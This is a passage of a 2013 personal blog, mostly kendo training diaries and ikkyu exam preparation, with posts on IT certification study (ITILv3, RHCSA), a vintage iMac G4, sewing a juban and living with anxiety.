Darn, I'm not the first one to coin "crowd skimming". This blog used it earlier, but to refer to copyright trolling of BitTorrent users, suing them for damages.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Here's the mountain, now start climbing

2013-05-26 20:28:00

Today I passed my ikkyu exam in kendo.

Ikkyu, being the final grade before shodan ("black belt"), means that you're on your way to understanding kendo and that you almost grasp all of the basics. Almost. The real hard work starts now :)

As I said to my friends who also took their exams today: "The introductory class is over, we are now rank beginners". Another analogy would be that a guide has shown me the mountain and that I now need to start climbing it. My foot is on the first step of the stairway. 

I am very happy that all of the help my sensei and sempai have given me, and my 2.5 years of effort, have led to at least some progress. Also, obviously I wouldn't have come this far without the continued support of my lovely wife and of my friends who cheer me on.

If anyone's interested, my dear friend Menno shot a video of my kirikaeshi and my two jitsugi. I was very happy to hear his reaction about my kendo, to paraphrase: "This is cool stuff! I now understand what you meant when you said your lung capacity was useful; your kiai kicks ass!". ( ^_^) I'm the one starting on the left, as Tomokiyo-san put it: "Lucky number 7".

ThomasIkkyu.m4v


kilala.nl tags: , , ,

View or add comments (curr. 4)

A sobering review

2013-05-18 21:45:00

a graph

"I don't think you understand what this thing is for." he said, gesturing with his shinai.

It didn't hurt as much as Zicarlo-sempai's stab to the stomach, but it stung a bit anyway. Only a little though and I'm putting aside the emotional aspect, to analyze the technical message behind it. Instead of sulking, it makes me want to train three or four times each week! Were I not a family man, I'd sign up with Museido right away for more practice.

But let's backpedal a bit to the beginning.

Today's class in Amstelveen was great, with a big turnout and an all-star cast. Our usual crew was expanded with a few highly placed teachers and students from Museido and Fumetsu. A chance for us all to learn something new!

Class followed the usual structure: kata, warming up, kihon, jigeiko. To prepare for my upcoming ikkyu exam I practiced kata with Zicarlo and Hans, learning the fifth kata along the way. I'm actually pretty happy with how that went, though there wasn't much tension between us. That's something to work on. 

Kihon practice went alright, though I let myself coast through it too much. I often let my body run on autopilot instead of paying attention and being fully aware of what's going on. That's not right. And yes, my chisai techniques are still awful. Given my lack of stamina I'm happy to say I did not take the short break that was offered between kihon and jigeiko, but instead jumped into a little shinsa practice with Zicarlo. "Every week a little stronger" as I keep telling myself in mokuso.

Seeing how the chance rarely occurs, I lined up with Mark Herbold-sensei for my second jigeiko. I first met him a few weeks ago at the CT where he impressed me with his teaching style and personality. After Tsuyuguchi-sensei's admonishment ("You should hit!") I'd picked up my pacing considerably, so I tried my best with Mark. In my mind I was not backing down and I was giving it multiple shots in a row. Compared to a few weeks ago I thought I was doing better. Maybe I was, meaning that I was pretty darn bad a few weeks ago ;)

After class I went to pay my respects and to get some feedback from Mark. You already know how he opened: "I don't think you understand what this thing is for." he said, gesturing with his shinai. Direct. No sugar coating. But definitely not the only thing he said, because he took quite some time to explain. 

That was the big take-away from today: be ready to jump and kill from the get-go, don't start building your energy after you've already engaged your opponent.

It was a sobering experience, which is something I need from time to time to remind me that I really am a rank beginner. But I'm going to use it to motivate myself. And yes, I'm still going to take the exam next week, simply to get an appraisal of my current level. It'll be a learning experience, however it turns out.


kilala.nl tags: , ,

View or add comments (curr. 0)

It's the small things

2013-05-08 08:38:00

mr Miyagi

Yesterday's training has two big take-aways for me.

  1. I should never break kamae, especially if I'm tired.
  2. I should hit. ( ^_^)

Throughout class I had been paying attention to all my weak points: only use my left hand, relax in kamae after kakegoe, don't have my left heel too high, proper timing of strikes and fumikomi, practice my chisai men strikes in the right way and keep on pushing through the exhaustion. I was feeling pretty good about myself! I managed to get through five of the six rounds of jigeiko too :)

Then comes the time to do jigeiko with Tsuyuguchi-sensei. He attacks me a few times, I attack him a few times but I leave plenty of openings unused. Then we get into tsubazeriai and he looks me in the eye smiling and says:

"You should hit."

I keep on making glancing blows against him and I often fail to grasp an opening he makes for me. Again in tsubazeriai he smiles and repeats: "You should hit. You should hit." And he's right. Obviously. :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Working towards my exams

2013-05-06 08:19:00

Change of plans! A few weeks ago I had a chat with Marli, who'd asked me if I still wanted to take my ikkyu exam by the end of May. Originally I was going to put the test off until winter because of our wedding anniversary, but since we're already taking a few days of fun midweek, she wanted me to go anyway. Yay :)

I'm feeling pretty confident about taking the ikkyu exam, insofar as I -know- most of the things I need to demonstrate. Most of the things I can actually do well, but I am not certain that my fighting skills are at the level that's needed. The most important weak point is my hunger/bloodlust: as Donatella-sensei remarked months ago, I attack in a general direction, not at a specific target.

Saturday's class was great and started off with a nice surprise: our friend Sebastian, who departed for Germany a few months after I started kendo, came to visit for some jigeiko! In the absence of Ton-sensei and Hillen, Kris-fukushou led class with kihon and jigeiko. Many things were said and done, some important pointers being:

For me personally, Kris had two important points of feedback:

As my mantra for mokuso goes these days: "every week a little stronger"... Despite getting more and more tired, I fought myself through jigeiko.


kilala.nl tags: , ,

View or add comments (curr. 0)

Centrale training: shiai and shinpan training

2013-04-28 21:03:00

Today was hard work! Over sixty people traveled to Sporthallen Zuid in Amsterdam for the national level 'central training'. This month's edition focused on shiai and shinpan skills, meaning both the fighting and the refereeing of competitions. Renshinjuku's turnout was also impressive, with a dozen members attending. Excellent :)

It was a lot to take in! Before lunch, Mark Herbold-sensei took us through kihon in order to practice legwork and speed. He impressed upon us the importance of moving from the legs and hips, with 80% of your effort coming from there. The remaining effort is 10% stomach to retain posture, then 8% and 2% left/right hands for the strike. By properly using your hips and legs you assure that you close in quickly and that you retain control of the situation.

Exercises included kirikaeshi, oki-men, oki-kote-men, hayai kote-men and then a number of hayai variations of kote-men, kote-men-men, kote-kote-men, kote-men-kote-men and so on. In each of these, the connection and distance between both kendoka was key: kakarite needs to move in fast enough to pressure motodachi backwards. Motodachi needs to be surprised and should not dance backwards before the attack. Learning this speed and pressure is what will help you overwhelm your opponent in shiai.

After lunch Vitalis-sensei went over a few basics regarding refereeing: valid strikes and hansoku (violations).

A valid point only has the following five requirements:

  1. Using the kensen, the top 1/3 of your blade.
  2. Using the hasuji, the cutting edge of the blade.
  3. On the datotsu-bui, the proper part of the target.
  4. With fighting spirit.
  5. With proper zanshin.

Salmon-sensei has written a little more about what makes a valid ippon. Vitalis-sensei remarked that many things that we learn are important for a strike (like ki-ken-tai-ichi) are NOT in the rulebook. This means they are NOT required for ippon. He also impressed upon us that there are two common mistakes that beginning shinpan make:

After Louis' introduction the sixty kendoka were divided across three shiaijo, each led by a high ranking sensei. I was assigned to Mark Herbold-sensei's shiaijo. He led the session with clear instructions and a pleasant amount of humor. He explained so many things, it's hard to remember them all. The following will simply be a stream of consciousness, trying to recall as much as possible of what was said.

The following points were made for me specifically:

 

The last hour of the day was free jigeiko. Sadly I had to leave early, but I'll get another chance later :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"Let's do it!" kendo etiquette poster

2013-04-22 23:40:00

kendo etiquette poster

I recently found myself inspired by Bunpei Yorifuji's famous "Please do it..." campaign posters promoting etiquette in the Tokyo subway. They are catchy, they're a bit funny and they manage to drive home a message clearly.

"What if", I thought, "we applied the same design esthetic and message to kendo?". Thus work has started on a kendo-centric set of "Please do it..." posters. First up, based on last weekend's shinai inspection, is a poster about maintenance. It is everybody's duty to ensure their equipment is safe and that no harm can be done to your fellow kendoka. Loose splinters on shinai may pierce somebody's eye!

The Japanese sentences were made using JEDict and Google Translate, so I'm sure they're full of mistakes. Please correct me!


kilala.nl tags: , ,

View or add comments (curr. 0)

Making a juban (undershirt) for kendo

2013-04-20 08:13:00

a cotton under shirt for kendo

With summer coming up I'm looking for ways to minimize wear and tear on my keikogi, the thick jackets we wear in kendo. The keikogi suck up loads of sweat and thus become pretty dirty very quickly. Unfortunately they also fade quickly and the rice-grain pattern also wears out pretty quickly if you launder them often. 

Traditionally, to keep expensive silk kimono clean, people wear a juban, which is a simple cotton undershirt. When I say "simple" I mean "less elaborate than a kimono", just check out the Pinterest on juban. There are even simpler juban, which look like thin white keikogi, sold by budogu shops such as Yamato. And that's exactly what I need, but I'll be damned if I pay $30-$40 for a simple shirt! That sewing machine isn't simply gathering dust in the attic!

Because I don't have any cotton lying around just now, I've modified a few of my old projects. Years and years back, when I was still in the SCA, I made two cotton under-tunics. Meant to be worn under my full-length tunic as an extra layer, they were thigh-length and had long sleeves. In order for them to be worn as juban, I have shortened the sleeves and the body so they don't show from under my keikogi.

So now I have two neat undershirts for kendo... And they even have embroidery on them! 

And to think I made those things fourteen years ago! Fourteen! ( O_o)


kilala.nl tags: , ,

View or add comments (curr. 2)

I was going to write, but then I fell asleep

2013-04-17 08:11:00

Hoooo boy, last night's training was good! Despite my hay fever I soldiered on and because of that I was dead tired when I came home. I managed to unpack my equipment bag, but nothing more. The moment my head hit the pillow I was g.o.n.e. Boom. I showered at the office just now ;)

Last week and yesterday class was led by Jouke-sempai, who was in the Netherlands for last weekend's EKC. Where we usually practice upwards of six techniques a night in 2x(2x5) bouts, he now had us repeating the same technique in a 2x(5min) setup. This dramatically lowered the amount of different things we got to try, but there are two huge benefits:

  1. Muscle memory
  2. The time to reflect

During kihon practice we focused on men (both oki and hayai), hayai kote and kote-men and finally hiki waza. The following points were made:

The past weeks, Hillen-sempai and Ton-sensei reprimanded me for my horrible hayai kote. I keep going in arcs, which messes up the practice we're doing. Yesterday I got the same reprimand from Miyahara-sensei. She had me do it over and over again, until I started showing something resembling a good kote-strike. Straight and through the center, no need to raise it high, no need to go wide.

Tsuyuguchi-sensei spent a lot of his time explaining hiki waza to me. Most of it was in Japanese (probably because I had given the impression that I speak it) so I missed big parts of it. However, the essence of what he tried to convey is this:

  1. Keep your hands low and lock the tsuba.
  2. Tsubazeriai is all about the hips, push from the hips.
  3. Put strong pressure against your opponent and push away.
  4. Did I say it's about the hips? Because you need to work from the hips!

I really appreciate the effort he put into explaining these things to me! It's the first time we've really spoken, so I went up to him after class to thank him again. Point #3 is a bit confusing for me, because I have often been told not to put any pressure in tsubazeriai. Not until you actually push off for your strike.

In jigeiko I had the chance to spar with Miyahara-sensei, who went over hayai kote with me some more. Try, try, try and try again. We also tried a number of other techniques, with her seemingly focussing on hayai men and debana kote. I also started jigeiko with Onno-sempai, but I had to bow out early because of my dizziness (thankyouverymuch hay fever). I spent the last ten minutes of class helping out our kouhai Gaby in practicing her kote strikes and footwork.

I haven't written much about kendo the past two months. Here's what happened.


kilala.nl tags: , ,

View or add comments (curr. 0)

Virt-ception: we've got to go deeper

2013-04-11 20:45:00

Desktop

I'm currently studying for my RHCSA certification. As part of the exam I will need to work with KVM virtual machines, which require a proper piece of hardware to run on.

Sadly I haven't been able to boot CentOS off a USB drive on my Macbook, despite numerous attempts. I've had a number of great tutorials, but no dice. Luckily my colleague Peter (not the one of the iMac) came to the rescue! He runs a sandbox system at home, which is a great playground to study for the RHCSA. He gave me an account and permissions to fiddle with KVM. 

Which is what landed me with the screenshot above. That's:


kilala.nl tags: , , ,

View or add comments (curr. 2)

A dream come true

2013-03-10 21:00:00

my new iMac G4

A few days ago I was discussing various models of Apple computers with one of the other consultants at the office. It didn't take me long to wax lyrical about the iMac G4, which in my opinion is the most beautiful PC ever produced by Apple. It combined good specs with a revolutionary design: the sunflower / lampshade look was really new. In my opinion the flexing arm for the screen really is one of the best inventions ever and I'm sad that the only way to get one with normal monitors is to buy an expensive extra mount.

Anyway, my colleague Peter overheard us talking and wondered whether I'd be interested in owning an iMac G4. DO I?! Haha, of course! It's been a dream of mine for a damn long time. The above paragraph should have made it clear that I love the design of the machine and that I consider it a timeless classic. Which is why he offhandedly remarked that his girlfriend has one at home, one they've considered sending to the scrapheap for a while now. Holy carp! ( O_o)

So here I am! Giddy and gleeful! Because what I now own, with many thanks to Peter and Ellen, is an iMac G4/1.25 17-Inch "FP" (USB 2.0). Or to put it in human words: the latest model of the iMac G4 series, with the improved TFT screen as well as USB2/FW400. It's from the same era when I bought my first Macintosh, the venerable Powermac G5 (aka, the first "cheese grater"). And it's in pristine condition, because they hardly ever used it. It's beautiful! It's complete (no parts missing) and it's now mine :9

The setup above is just about exactly how you'd expect to see it in 2003, with the exception of the speakers. The Apple Pro speakers look great, but they really don't sound too great. So I've replaced those with the LaCie Firewire Speakers that I bought years ago. These really sound awesome and come with a minimum of cable fuss as they are also bus-powered.

The iMac came with OS 10.4.11 installed, which is pretty old already. Unfortunately I don't have my 10.5 DVD anymore (returned to Snow when I left their company), so I'm borrowing a friend's install disk. When it's upgraded to 10.5 I'm sure it'll make a heck of a nice machine. Heck, even at 10.4 it's already very nice and completely usable. I'm actually surprised at the performance! The 1.25GHz G4 and the 768MB RAM work very nicely.


kilala.nl tags: , , ,

View or add comments (curr. 6)

A visit by Furuya-sensei

2013-03-06 10:29:00

It has been a month of remarkable kendo! First there was the big party, then last week was a tiny group of people and yesterday Furuya-sensei paid us a visit. Stopping over for a single day on his way to the Furuya Cup in Peru, he made sure to come observe the dojo he helped raise in the Netherlands. We were also joined by Mark Herbold-sensei, who recently achieved 7-dan.

With roughly thirty-five kendoka attending the training session we used the motodachi system, with anyone 3-dan and higher acting as motodachi. We worked on solidifying our basics: kirikaeshi, men, kote-men and kote-do. We closed with half an hour of jigeiko.

The following points were stressed during class:

Because our founder's sensei was present, a lot of attention was paid to mistakes in etiquette. For example:

Furuya-sensei indicated that he was happy to be back in the Netherlands and to train with us. He hopes that we will continue training hard, working on improving our kendo. He also hopes that next year we can organize another Furuya Cup in the Netherlands, as it is an important tourney in Europe.

In jigeiko I practiced with four people:

  1. I started with Bert Heeren-sensei. He took me through a mix of uchikomi keiko and kakari geiko, where he either showed an opening, let me make one or where he attacked me. He indicated that he was pleased with how I was doing, with regards to the effort I'm showing. He didn't comment on my kendo, as his goal with our jigeiko is mostly to make me fearless. I should not fear my opponent, nor should I hesitate, regardless whether I'm up against a kouhai, a sempai or a 6-dan teacher.
  2. After being absent for a few months, I'm glad I got to spar with Mischa. I mostly tried to practice chisai men and debana kote, but threw in some other stuff as well. I'm nowhere near his level yet (obviously, as he's 3-dan I believe), but I hope that we both took something away from the practice.
  3. I also went at it hard against Jeroen and Davin, with whom I am roughly on par. These two rounds of practice were excellent for going all out and throwing in the last shreds of energy I had.

kilala.nl tags: , ,

View or add comments (curr. 0)

Overview of dutch kendo dojo

2013-02-28 07:20:00

Yesterday I spent a few hours gathering information on all Dutch kendo dojo. The NKR only has a list of city + dojo name on their website, which isn't terrifically navigable. I took the list, gathered all the website information and then gathered all dojo locations. I then spent an hour putting them all into a Google Maps project. The result: a map of all Dutch kendo dojo.

 

 

Also in Dutch, so Dutch kendoka can find it:

Gisteren heb ik een paar uurtjes besteed aan het verzamelen van informatie over Nederlandse kendo dojo. De NKR heeft een lijst met steden en dojo namen op hun site staan, maar heel erg handig werkt die niet. Ik heb van alle dojo's op de lijst een overzicht gemaakt van hun website, plus het adres van hun trainingslocaties. Daarna kostte het me een uur om ze allemaal in een Google Maps project te zetten. Het resultaat: een overzicht van alle Nederlandse kendo dojo, op de kaart.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Booyah! My biggest failing in kendo analyzed

2013-02-24 21:49:00

My wife, ladies and gentlemen! My dear wife just helped me figure out one of my biggest failings in kendo!

Countless times I have been told by various teachers that I double-step or step through when jumping in for a strike. I keep getting warned about it, but I've never consciously felt it happen. Sure, I was aware that I keep shuffling my feet to find footing for the lunge, but I've never felt the "step through with left" happening. Until last night during the big training, when I think I felt it happen at the back of my head.

But that's not the big success here. No, that's my wife's analysis of the same situation!

Watching me do kihon practice, she noticed that my whole body teeters to the right when I'm about to lunge. It happens especially when I start leaning in for the lunge. And then, when I lunge, she sees me pull my left foot up to the right foot (or past it!) after which I actually jump.

And the answer is!.... *drumroll* Weight distribution!!!

I keep my weight too much on the front leg and then I only increase that when I start leaning in for the lunge. Earlier, I learned that back-front should be 60-40 at rest. In my case it's probably reversed: back-front is 40-60. Then it gets worse when I lunge, going to 20-80! THAT'S WRONG! How can I jump from the left foot, when all my weight is on the right?! That's right, I cannot! Which is why I instinctively doublestep/overstep, to get the weight back on the left foot.

I'm so grateful that she saw through that! This really gives me clear details to work with.


kilala.nl tags: , , ,

View or add comments (curr. 8)

Anxieties and living with them

2013-02-24 21:27:00

The past few months I've been dealing with my anxieties in what, I hope, is a better way than before. Having been through CBT has certainly been empowering and educational. That doesn't mean that I'm free of anxiety, but it does mean that I've learned ways of dealing with them. 

Funnily, yesterday I had a bout of anxiety when we dropped off our daughter with her grandparents in Friesland. Plenty of doubts and worries pent up about her sleepover, which led to some physical effects while we were there and on the drive home. I was also a bit anxious about the night's kendo practice. All of that was mostly resolved by talking about it with Marli, which certainly is one of the prime methods I've learned: dispelling illogical and worrisome thoughts with the help of others. 

I am writing an article for Kendo World magazine, based on my experiences with anxiety and kendo. The article will explain what anxiety disorders are, how they are treated, how I've experienced it and how it can occur in a kendo dojo. If everything goes as planned it'll be printed in the next issue. Exciting!


kilala.nl tags: , ,

View or add comments (curr. 0)

Successes from coaching

2013-02-24 20:52:00

Keuzes Maken

For the past few months I've been undergoing personal coaching, by Menno. Today we simply spoke about the successes I've booked over the past few weeks. All of them were brought on by actions I undertook based on the coaching I've been receiving. Each of the following was an 'action point' or 'todo' item from our sessions.


kilala.nl tags: , , ,

View or add comments (curr. 1)

An awesome night of kendo with friends

2013-02-24 20:16:00

Training

Yesterday was wonderful, a great night of kendo and of building friendship. Renshinjuku Kendo Dojo organized a big training and buffet party in honor of a few of our members. Fukuyama-sensei and his family, as well as Tanida-sempai and his family are returning to Japan. Also, Kurogi-sensei recently achieved seventh dan ranking. Great reasons for a 'Sayonara & Omedetou' (farewell and congratulations) party.

Marli came with me, which means a lot to me. Last time she hadn't enjoyed the buffet very much, so it says something that she tagged along again. Sweetie <3 Double-sweet, because she spent some time taking notes about my performance.

I was expecting a bigger turnout than usual, as it was the Saturday afternoon training. What I did NOT expect was sixty to seventy kendoka turning up! Kurogi-sensei brought along a number of his students from Belgium and a five-strong delegation from Scotland was also in town, for today's Iijimia Cup. Because it was such a big group we ran the night in the motodachi system, with twelve higher ranking teachers lining up to train with all students. Roelof-sensei took care of the fifteen beginners.

Training consisted of kihon and a few waza: kirikaeshi, oki-men, oki-kote-men, chisai-men, chisai-kote-men, men-taiatari-hiki-men-men, men-taiatari-hiki-kote-men. Then an hour of jigeiko! I sparred with Fukuyama-sensei, a gentleman I am not familiar with and with Tsuyuguchi-sensei.

I always enjoyed working with Fukuyama-sensei, so I'm sad to see him go. There's just something cool about his ever-smiling face behind the mengane. In the photo above I'm at the far right, practicing chisai-men with Fukuyama-sensei.

During jigeiko I was feeling the effects of the afternoon's anxiety and I was close to quitting three times. But every time I thought "just one more fight" and then I pushed through. It sure helped that, during waza practice, Heeren-sensei shortly took me aside to compliment me, reassuring me that I was doing alright.

Dinner was nice and we enjoyed a good, long chat with my kendo friends. Jeroen, Zicarlo, Davin, Nienke, Gaby, all fun people to talk to about kendo and other geekery :) I also had a nice, open-hearted talk with Heeren-sensei which provided me with some much-needed insights.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Starting preparations for RHCSA

2013-02-21 22:31:00

Well, this is a first. Sometime soon, my Macbook will be booting another operating system than Mac OS X for the very first time in its life. Sure it's run Solaris, Fedora and Windows! But that was using Parallels virtual machines...

In order to prepare for the RHCSA certification I will need to learn about setting up virtual machines on a physical Linux box. And since we don't have the €200-€300 to buy a test box (which I'll only use for these two exams) I'm stuck using my primary laptop. That means I will be taking notes locally on Linux, which should be a cinch using the Evernote web interface.

I just hope that running CentOS on an external USB 2.0 drive hooked up to my 2008 laptop won't be too slow to work with :)


kilala.nl tags: , ,

View or add comments (curr. 0)

ITILv3 certification achieved

2013-02-17 08:55:00

ITILv3 certificate

Right, that's out of the way!

In late december I made a plan for 2013, which would enable me to retain my CISSP certification while at the same time restoring my relevance to the IT job market. A few weeks later I got started on my ITILv3 studies, but those ground to a sudden halt when I chose an awful book to study from. A week later I started anew using the study guide by Gallacher and Morris, which is a great book!

A month after starting the Gallacher and Morris book I took my exam using the EXIN Anywhere online examination. I didn't want to spend time away from the office to take this simple exam, which is why I went for the online offering. I'm very glad EXIN are providing this service! I thought I'd share my experience with the EXIN Anywhere method here.

I also provided EXIN with two pieces of feedback after taking the exam.

  1. During the setup phase, you are allowed to re-take your photograph and to re-take the photograph of your ID card. However, there is no option available to restart the room inspection. During my room inspection an error popped up from the proctor software which suggested that filming could maybe not be completed. But no definitive answer was provided and there was no option to restart the filming of your workspace. I sincerely hope I don't get failed on the exam because of this.
  2. The exam format is rather unfriendly, when compared to other computer-based exams. In essence it is simply a long HTML document with all the questions underneath each other. Other testing suites (though admittedly offline) put the questions in a much more user-friendly format: one question at a time, an option to mark questions for review, etc.

All in all I'm happy with how all of this went and it's certainly nice to have refreshed my ITIL knowledge. I last studied ITILv2 in 2001.

The fact that it took me a month to study for this test worries me a bit though. The total prep time for ITILv3 was 15 hours (translating into 15CPE for my CISSP). I'm fairly certain that my RHCSA will easily take over 80 hours, which does not bode well. I reckon it might be somewhere between my LPIC and my CISSP studies when it comes to workload. If I want to achieve it within a reasonable timeframe, I will need to stick to a much stricter regime. 


kilala.nl tags: , ,

View or add comments (curr. 1)

Bad kendo, great training and moral dilemmas

2013-02-13 07:49:00

Last night's training was awesome: I was beat by the end, knowing I certainly gave it my best effort.

Unfortunately my kendo was crap, because every little bit of basics was wrong. I was pulled aside by every single senior sempai with whom I crossed shinai! Heeren-sensei grabbed me twice, once to point out mistakes in my striking and once to admonish me about my footwork. The same footwork issues were also reported by both Koseki-sensei and Kiwa-sempai. Ran-sempai sternly indicated that I constantly dropped pressure in jigeiko and that I was not even responding to any of the openings he made. Makoto-sempai saw right away that my timing of ki-ken-tai-ichi was completely dead and Miyahara-sensei complained about a headache from my men strikes by the end of class. She didn't think I was striking too hard or with too much right hand, but mostly from too close a range.

So every little bit of basics was wrong: footwork, striking, tenouchi, timing, ki-ken-tai-ichi, swinging, shinai grip. Everything. I didn't allow myself to get too frustrated by all of it, only getting irked a little right after each explanation and then moving on.

On the way home I had a good talk with Jeroen-sempai, about the future of our Almere dojo. We both feel that the dojo could use a heavy dose of discipline and rigour and that it would be great if it started mirroring the Amstelveen dojo. We are however unsure how this could be achieved under the current leadership. In the past I've already been told by sensei that my stance is too strict, that my teaching of the beginners' group was too harsh and that enforcing discipline to the degree I'd desire would scare off all the beginners.

Jeroen and I will be submitting a few suggestions pertaining to class structure and instruction to beginners. Most importantly, Jeroen thinks that our whole group would be best served by focusing more on basics than on waza practice. Every week the bogu-group spends a lot of time practicing many different waza for a tiny amount of time and Jeroen would suggest that we instead divide our practice into a monthly schedule: weeks 1, 2 and 3 are spent practicing one specific subject and week 4 will merge them all. I certainly think his idea has merit!

One thing that I am conflicted about is the following: both Marli and myself think that I would make faster progress if I trained at Amstelveen twice a week, instead of once there and once in Almere. However, to me this would feel like "abandoning" and disrespecting Almere after all their hospitality and because I truly feel that I can help them grow through the years. So it's a moral dilemma for me: do I choose harder training and faster progress, or do I choose loyalty to the group that first took me in?

EDIT 17/02/2013:

Yesterday we did not end up talking to Ton-sensei, because I was occupied before class. While the group practiced kata, I took aside three beginners and Ramon to teach them the basics of shinai maintenance. The night before I had put together a cheapass kit of tools needed for the job: sandpaper, nails (to use as a makeshift awl), an exacto knife and a few tealights. I taught them how to tighten the tsuru and the nakayui and how to look for splinters. I'm proud of Peter for spotting a bad take in his shinai, correctly noticing that it was splitting across the breadth.

After warming up and legwork practice I was asked by Ton-sensei to teach the beginners group, while the guys in bogu did kihon practice with those whom already have had a few months' practice. But before we got to that, I taught Felix how to put on a tenugui and his men. The beginners, I took through oki-men and oki-kote by simply doing the suburi strikes back and forth across the training hall. The biggest problem I noticed was that all three of them end up with their arms far too low when striking men: the angles are all wrong. Just like they were with me ;)

My part of their training ended with me introducing the mechanics of seme-to-tame-to-butsu to them. I didn't tell them all of it, just to kakegoe, hold their breath, focus and then strike. This showed good results with the two older beginners, who were indeed more focused. But the youngster (I think he's 11) was afraid to kakegoe; he felt weird yelling at me, very embarrassed.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Structures: solidifying goals and intentions

2013-02-10 11:54:00

My dou, with motto

One of the recurring themes in my coaching sessions with Rockover is "structures": things you put in place to act as reminders of something that you need to (or want to) change. I've talked about one of'm before. In order to solidify my new motto, I've given it the same treatment as the previous one that I took in: both adorn the inside of my dou, the torso armor worn in kendo.

Sure, my kanji look crappy, but it will serve its purpose: to remind me of what I want to achieve at the beginning of every training session, class and seminar. 

EDIT:

That photograph reminds me: the Agyo omamori in my dou is officially way overdue on being returned to the shrine it came from. We bought it in Nara in October of 2011 (photo of the temple), meaning that we were supposed to return it three months ago. Since I'm not religious I don't believe I'm calling down any bad luck upon myself, but then again I do value tradition :) Maybe I should drop another email to the Dutch shinto shrine.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Whittling down the mistakes

2013-02-06 11:10:00

Last night's training was very nice: no lessons or class, just simply training, training and more training. Kihon, waza and jigeiko. Along the way I received pointers from our higher-ranked kendoka Kiwa, Machi, Makoto and Ran. Many of the pointers come down to improving techniques that are basic and important for my ikkyu ranking.

Funny detail: we relied heavily upon our prior seme-to-tame-to-butsu training last night. During our practice of hiki-men I faced against Makoto and against Loek and both gentlemen really succeeded in making me feel the seme building! Because a second or two after their kakegoe, I instinctively felt chills down my neck and found myself thinking "ohcrapohcrap, here it comes!" ( ^_^)

Also, it's interesting how I tense up in jigeiko. During most of practice my breathing was fine, but in jigeiko I got tired really fast, because my arms and shoulders lock up and my breathing goes to heck.


kilala.nl tags: , ,

View or add comments (curr. 0)

New kendo goodies! Thanks honey

2013-01-30 21:53:00

kendo uniforms and spare parts

In light of my planned ikkyu exam later this year, we'd been talking about buying me a new uniform set: one to keep neat and tidy, only to be used at tournaments and gradings. I'd been putting that off for months, until Marli last week decided to surprise me ( ^_^)

Originally she'd wanted to place the order by herself, but she had no idea what to order. So instead, one evening she grabbed me and said "Let's shop!" :D Because I've been very satisfied with the service and products provided by Kendo24, we returned to them. And again they came through! My darling wife ordered me:

As I've grown accustomed from them, Bernd and Katrin provided excellent service. They provided quick and clear email feedback on my questions and shipping was very fast. They even threw in a free pair of chichikawa to attach the men himo, because I couldn't find those on their webshop.

So, now I have two gi and a hakama for practice and a separate gi and hakama for special occasions. And I finally have a bit bucket of my own, for shinai maintenance.

A few interesting things about the clothes:

 

In closing: Thanks honey! I really appreciate the cool gift and your continued support in my training!


kilala.nl tags: , ,

View or add comments (curr. 0)

A new motto for this year: katsubou

2013-01-29 21:20:00

katsubou

Well! It's not every day that I get a mention on a 7th dan sensei's blog :D

My motto for 2012 was enryo (遠慮): "restraint". 

The motto has served me well and I will continue to be inspired by it. It still adorns my desk and it is on the inside of my dou. At the office I have become better at communicating and at sticking to boundaries and in kendo I have become less apt to rush in foolishly. 

For 2013 I will be adding a new motto, katsubou (渇望): "hunger, craving".

This motto comes through inspiration by four people whom I've come to respect very much. Donatella-sensei and Vitalis-sensei, after their instructions at the last Centrale Training. And Kris and Hillen-fukushou, based on their feedback to our recent kyu exams. Summarizing it: without stupidly rushing in (see above), I need to crave achieving yuko datotsu on my opponent. I need to hunger for "kills" and to show eagerness in all my undertakings. Only then will I be properly training and will I be able to show my current skill level in a shinsa.

Interestingly, this motto is also applicable professionally, insofar as I'm working to retain my CISSP certification. I'd slacked off over the past two years, but now I'm working hard to make up for that. In order to achieve this plan fully, I need to be "hungry". I need to keep at it, working on each successive goal in order to reach the final destination.

It'll be an interesting year :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo kyu exams in Almere

2013-01-26 16:51:00

Photo gallery of the morning.

This morning were the (semi-)annual kyu grade exams at Renshinjuku kendo dojo. I'm told that we're the only dojo in the Netherlands that actually do intermediate kyu exams, but personally I think they're a good thing. These exams help prepare our students for the actual exam, making the real thing a lot less scary.

Today, thirteen students were testing: five for 5th, one for 4th, two for 3rd and five for 2nd. The way we test 2nd kyu is actually identical to the official 1st kyu exam, meaning that we're getting a full prep for ikkyu.

The good news is that everyone testing up to 3rd kyu passed their grade. So congratulations to Ainar, Lukas, Dennis, Vincenzo, Herman, Ramon, Aaron and Hugo! Good work everyone!

The group testing for 2nd kyu wasn't as successful. Only Jeroen was deemed to be ready to take and pass the ikkyu exam, so many congratulations to him: you've worked hard for this Jeroen!

Bobby, Martijn, Tiamat and myself were all given valuable pointers on what we need to improve to be ready for the 1st kyu exam. Two pieces of advice were applicable to all of us:

  1. In jitsugi, you need to be hungry! You need to really want to make those ippon! Don't be passive and don't do shiai kendo. Instead, have at it!
  2. Stick to kihon. There's no need for über-special techniques, because if you -do- try those they'd better be done right!

At this level you're trying to prove that you fully understand and control the basics.

I had already set a number of goals for myself to work on, in order to attain ikkyu rank: get a decent hayai-men, control my breathing, and less cueing before a strike. Also: make for a neat and tidy kirikaeshi, because a few weeks ago I was still all over the place. Added to this comes the feedback from Kris and Hillen:

After the exams, Aaron said his farewells to me. I'm sad to see him go because he shows a lot of promise. Maybe he'll be back in a few years. 

All in all it was a very educational morning! I am confident that I showed my best kendo:

While my kendo was not up to par to pass our 2nd kyu exam, I am confident that I gave it my best. I simply need to keep on getting better! :)

EDIT: Woohoo! I've spoken to Ton-sensei and he indicates that I defaulted to 3rd kyu, meaning that I have at least improved my kendo since last year. So when it comes to the line-up in class, the only thing that changes is that I have now hopped at least six spots to the right :)


kilala.nl tags: , ,

View or add comments (curr. 3)

Learning a new skill: seme to tame to butsu

2013-01-22 20:09:00

Tonight’s class was guided by Fukuyama-sensei, in the absence of Heeren-sensei, with Kiwa-sempai providing translations for those not familiar with the Japanese language. After the usual warming-up routine (no kata practice tonight), we moved on to two separate but entwined subjects:

  1. Seme to tame to butsu
  2. Hiki waza

In kendo we are often taught to “build pressure”, to “feel tension” before launching an attack. This pressure is described with the word seme (攻め) and it is something that is learned through long practice. The Glossary related to budo and kobudo by Guy Buyens offers the following:

